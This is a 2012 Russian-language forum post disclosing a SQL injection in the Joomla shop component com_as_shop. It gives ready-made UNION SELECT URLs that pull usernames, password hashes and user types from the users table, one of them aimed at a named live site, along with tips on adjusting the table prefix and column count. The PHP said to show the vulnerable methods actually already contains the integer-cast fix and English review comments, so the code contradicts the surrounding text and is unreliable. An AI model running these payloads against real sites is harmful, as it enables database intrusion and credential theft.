
15.01.2012, 20:59
com_as_shop
SQL-инъекция в компоненте com_as_shop для Joomla
Уязвимость (SQL-инъекция) в компоненте "com_as_shop" для Joomla: параметр id подставляется в SQL-запрос без приведения к числу и без экранирования.
Exploit:
Код:
http://site.ru/index.php?option=com_as_shop&cmd=gbc&id=-1+union+select+1,concat(username,0x3a,password,0x3a,usertype),3+from+jos_users+--+
Уязвимый параметр: id (сравнивается в запросе без кавычек, поэтому достаточно подставить UNION без выхода из строки). Префикс таблиц jos_ — значение по умолчанию Joomla; на конкретном сайте он может отличаться (в примере ниже — s15092010_). Число столбцов в UNION SELECT (в примере — 3) должно совпадать с числом столбцов уязвимого запроса; при `SELECT *` оно зависит от схемы таблицы и подбирается отдельно.
Example:
_http://www.scandimix.ru/index.php?option=com_as_shop&cmd=gbc&id=-10+union+select+1,concat(username,0x3a,password,0x3a,usertype),3+from+s15092010_users+--+
Уязвимые места в коде (файл components/com_as_shop/controllers/goods.php): методы getGNameById, getGArticleById и getGPriceById склеивают $id с текстом SQL-запроса конкатенацией, без приведения к int и без экранирования.
PHP код:
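/**
 * Return the `name` column of the `#__as_goods` row with the given id.
 *
 * @param mixed $id  Goods id; coerced to int before it reaches the query.
 * @return string|null  The row's name, or null when no row matches.
 */
function getGNameById($id)
{
    /// Joomla ver28.10.2010
    // `id` is compared unquoted, so a raw string lets the caller rewrite the
    // query ("-1 UNION SELECT ..."); forcing an integer closes that hole.
    // NOTE(review): the request-side read of `id` is outside this file's
    // view and should be sanitised there as well — confirm against caller.
    $id = (int) $id;
    $this->db =& JFactory::getDBO();
    $sSQL = "SELECT * FROM `#__as_goods` WHERE `id` =" . $id;
    $this->db->setQuery($sSQL);
    $rw = $this->db->loadObjectList();
    // Unknown id: return null instead of dereferencing $rw[0] on an empty list.
    if (empty($rw)) {
        return null;
    }
    return $rw[0]->name;
}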
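/**
 * Return the `article` column of the `#__as_goods` row with the given id.
 *
 * @param mixed $id  Goods id; coerced to int before it reaches the query.
 * @return string|null  The row's article, or null when no row matches.
 */
function getGArticleById($id)
{
    /// Joomla ver28.10.2010
    // `id` is compared unquoted, so a raw string lets the caller rewrite the
    // query ("-1 UNION SELECT ..."); forcing an integer closes that hole.
    // NOTE(review): the request-side read of `id` is outside this file's
    // view and should be sanitised there as well — confirm against caller.
    $id = (int) $id;
    $this->db =& JFactory::getDBO();
    $sSQL = "SELECT * FROM `#__as_goods` WHERE `id` =" . $id;
    $this->db->setQuery($sSQL);
    $rw = $this->db->loadObjectList();
    // Unknown id: return null instead of dereferencing $rw[0] on an empty list.
    if (empty($rw)) {
        return null;
    }
    return $rw[0]->article;
}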
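/**
 * Return the `price` column of the `#__as_goods` row with the given id.
 *
 * @param mixed $id  Goods id; coerced to int before it reaches the query.
 * @return mixed|null  The row's price as returned by the DB layer, or null when no row matches.
 */
function getGPriceById($id)
{
    /// Joomla ver28.10.2010
    // `id` is compared unquoted, so a raw string lets the caller rewrite the
    // query ("-1 UNION SELECT ..."); forcing an integer closes that hole.
    // NOTE(review): the request-side read of `id` is outside this file's
    // view and should be sanitised there as well — confirm against caller.
    $id = (int) $id;
    $this->db =& JFactory::getDBO();
    $sSQL = "SELECT * FROM `#__as_goods` WHERE `id` =" . $id;
    $this->db->setQuery($sSQL);
    $rw = $this->db->loadObjectList();
    // Unknown id: return null instead of dereferencing $rw[0] on an empty list.
    if (empty($rw)) {
        return null;
    }
    return $rw[0]->price;
}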
Как видим, по комментарию в коде версия компонента датирована 28.10.2010. Исправление: приводить $id к целому (`$id = (int) $id;`) до подстановки в запрос и не обращаться к $rw[0] при пустом результате.
-----------------------------------------------------------
(c) By winstrool